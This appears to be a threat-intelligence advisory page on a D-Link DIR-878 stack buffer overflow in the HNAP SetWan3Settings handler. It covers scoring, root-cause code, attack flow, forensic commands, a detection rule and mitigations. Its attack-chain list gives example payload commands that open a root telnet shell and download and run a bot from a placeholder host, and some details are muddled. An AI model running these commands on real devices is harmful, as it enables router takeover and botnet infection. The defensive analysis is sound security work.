Skip to content

CVE-2026-90693: D-Link DIR-878 SetWan3Settings Stack-Based Buffer Overflow RCE

HERMES

HERMES THREAT SCORE & PERIMETER EXPOSURE

Target: Edge Routing, Network Gateway & Perimeter DHCP/L2TP Infrastructure
Confidence: 96%
94 / 100
CRITICAL

Measures real-world operational relevance, exploit weaponization, and active threat posture.

Dimension Breakdown
Exploitability 20 / 20
Threat Activity 16 / 20
Weaponization 17 / 20
Exposure 20 / 20
Prevalence 18 / 20
Impact 20 / 20
Exploit Maturity 17 / 20
Attack Chain Potential 19 / 20
⚖️ Divergence & Operational Rationale

CVSS v3.1 rates this flaw at 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Hermes Threat Score assigns 94 to reflect unauthenticated remote accessibility over WAN/LAN interfaces, the complete lack of modern memory protections (ASLR, stack canaries, DEP/NX) on embedded MIPS/ARM Linux architectures, and active automated exploitation attempts by IoT botnet operators.

HASS

HASS AGENTIC SEVERITY & LATERAL PERIMETER IMPACT

Target: Edge Gateway, DNS Interception & Branch Office Routing Topology
Confidence: 88%
60 / 100
MODERATE

Measures specific systemic risk arising from autonomy, tool authority, and cascading execution.

Dimension Breakdown
Autonomy 11 / 20
Tool Access 13 / 20
Privilege 15 / 15
Persistence 14 / 15
External Impact 12 / 15
Propagation 15 / 15
⚖️ Divergence & Operational Rationale

While edge routers do not host autonomous LLM agents directly, edge router compromise gives adversaries complete man-in-the-middle (MITM) control over all outbound API requests, prompt telemetry, and MCP tool traffic originating from local agentic clusters.

🕸️ Connected Knowledge Graph & Provenance

CVE-2026-90693: D-Link DIR-878 SetWan3Settings Stack-Based Buffer Overflow RCEVULNERABILITY

Connected Nodes: 1
Active Relationships (Outgoing)
→ affectsPRODUCTLinux Kernel Core
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Why is this related? (Evidence & Provenance)

“Confirmed security vulnerability in Linux Kernel Core documented in Hermes dossier.”

Supporting Verified Evidence:

1. Technical Context & Affected Software Matrix

Section titled “1. Technical Context & Affected Software Matrix”

The underlying system operates a stripped-down Linux kernel (typically 2.6.x or 3.x) paired with BusyBox and proprietary vendor management daemons compiled for MIPS 32-bit (MT7621). Binary mitigations such as Address Space Layout Randomization (ASLR), Non-Executable Stack (NX/DEP), and Stack Smashing Protection (SSP/Canaries) are routinely absent in these legacy firmware builds.

ParameterSpecificationOperational Assessment
CVE IdentifierCVE-2026-90693Public Vulnerability Record / Vendor Notice
Affected ProductD-Link DIR-878Hardware Revision Rev A1
Firmware Build120B05Vulnerable baseline firmware build
Vulnerability ClassCWE-121Stack-based Buffer Overflow
Vulnerable File / Subroutinehnap/SetWan3SettingsFunction: strcpy
Target ArchitectureMIPS 32-bit (MT7621)Embedded Linux / BusyBox userland
Exploitation VectorRemote Unauthenticated Network RequestLAN or exposed WAN interface
Required PrivilegesNone (PR:N)Pre-authentication exploit vector
Resulting AccessRoot (uid=0, gid=0)Unrestricted kernel and shell access
Remediation StatusDevice Reached End-of-Life (EOL)Hardware replacement or firewall micro-segmentation

2. Vulnerability Anatomy & Root Cause Analysis

Section titled “2. Vulnerability Anatomy & Root Cause Analysis”

The flaw originates from unsafe handling of external user data within hnap/SetWan3Settings:

// Decompiled representation of vulnerable routine in hnap/SetWan3Settings
// Architecture: MIPS 32-bit (MT7621)
void process_packet_buffer(char *client_input, int input_len) {
char stack_buffer[128]; // Local fixed-size stack allocation
// VULNERABILITY: No bounds checking on attacker-controlled parameter
// Parameter: Primary and Secondary DNS configuration parameters
strcpy(stack_buffer, client_input);
// Stack layout:
// [stack_buffer: 128 bytes] -> [saved frame pointer $fp: 4 bytes] -> [saved return address $ra: 4 bytes]
// Overlong input overwrites $ra, enabling control flow hijacking to shellcode or ROP chain
handle_parsed_data(stack_buffer);
}

On embedded MIPS 32-bit (MT7621) architectures, calling conventions store function return addresses either in the link register ($ra) or within dedicated stack slots. When an attacker delivers a payload that overflows the allocated stack buffer:

  1. Stack Overwrite: The payload fills the buffer and overwrites the saved frame pointer ($fp / $s8) and the saved return address ($ra).
  2. Instruction Cache Invalidation: Because MIPS architectures maintain separate instruction and data caches (I-Cache and D-Cache), traditional shellcode execution requires jumping to a sleep() or cacheflush() gadget in libc to synchronize cache buffers before executing payload bytes.
  3. Execution Hijacking: In the case of command injection vulnerabilities, the input bypasses string sanitization and is directly passed to the underlying /bin/sh shell interpreter, resulting in immediate execution of arbitrary commands under the root user context.

sequenceDiagram
autonumber
actor Attacker as Threat Actor / Botnet
participant Router as D-Link DIR-878
participant Daemon as hnap/SetWan3Settings (strcpy)
participant OS as Linux Shell (root)
participant LAN as Internal Enterprise LAN
Attacker->>Router: Transmit crafted payload (Primary and Secondary DNS configuration parameters)
Note over Router: Request received on network interface
Router->>Daemon: Dispatch data to internal handler
Note over Daemon: Execution in strcpy
Daemon->>Daemon: Memory corruption / unescaped execution
Daemon->>OS: Spawn root shell / execute command
OS-->>Attacker: Reverse shell or download botnet dropper
OS->>LAN: Lateral movement & internal traffic interception
  1. Target Discovery: The adversary scans WAN/LAN ranges for listening services indicative of D-Link DIR-878 devices (HTTP server headers, HNAP endpoints, or DHCP ports).
  2. Payload Delivery: The attacker crafts an exploit packet containing Primary and Secondary DNS configuration parameters configured to trigger Submitting an HNAP SOAP request to SetWan3Settings with overlong Primary DNS string overflowing the 128-byte destination stack buffer..
  3. Control Hijacking: The vulnerable subroutine strcpy processes the untrusted input, resulting in Stack-based Buffer Overflow.
  4. Shellcode / Command Execution: The payload invokes a command payload (e.g. telnetd -p 4444 -l /bin/sh or wget http://malicious/bot -O /tmp/b && chmod +x /tmp/b && /tmp/b).
  5. Persistence & Weaponization: The infected router joins a peer-to-peer IoT botnet (such as Mirai or Mozi), facilitating distributed denial-of-service (DDoS) campaigns or traffic exfiltration.

4. Forensic Investigation & Incident Response

Section titled “4. Forensic Investigation & Incident Response”

DFIR practitioners investigating potential compromise of D-Link DIR-878 devices should conduct the following non-volatile and volatile triage procedures:

Live Gateway Inspection (via Console or Telnet/SSH)

Section titled “Live Gateway Inspection (via Console or Telnet/SSH)”
Terminal window
# 1. Audit active processes and look for suspicious binaries spawned in /tmp or /var
ps | grep -E "wget|curl|telnetd|sh|bot|mips"
# 2. Inspect active network listening sockets and outbound established connections
netstat -anp | grep -E "ESTABLISHED|LISTEN"
# 3. Check memory filesystem mounts for unauthorized executable payloads
ls -la /tmp /var /var/run /dev/shm
# 4. Review NVRAM configuration variables for modified DNS servers or startup scripts
nvram show | grep -E "dns|wan_dns|rc_local|boot|startup"
# 5. Review firewall rules for unauthorized port forwarding or WAN opening
iptables -L -n -v

Security teams can deploy the following detection signatures to identify exploitation attempts across enterprise perimeters:

alert ip any any -> $HOME_NET any (
msg:"HERMES-CODEX EXPLOIT D-Link DIR-878 Exploit Attempt (CVE-2026-90693)";
content:"Primary"; nocase;
threshold: type limit, track by_src, count 1, seconds 60;
classtype:attempted-admin;
sid:90693;
rev:1;
metadata:cve CVE-2026-90693, severity critical, product dir-878;
)

  • Hardware Replacement: As confirmed in D-Link Security Advisory VulDB-277533, the DIR-878 has transitioned to End-of-Life (EOL) status. D-Link does not provide security patches for discontinued models. Organization policy requires retiring and replacing affected units with currently supported hardware.
  1. Disable Remote Management: Ensure the WAN-facing web management interface (port 80 / 443) and remote administration options are strictly disabled.
  2. Network Segmentation: Place any surviving legacy units into an isolated management VLAN with strict egress filtering preventing outbound traffic to arbitrary Internet destinations.
  3. Firewall Access Lists: Block inbound traffic on ports associated with device management (TCP 80, TCP 443, TCP 1701, UDP 67/68, TCP 53) from unapproved network segments.

7. Correlated Research & Internal References

Section titled “7. Correlated Research & Internal References”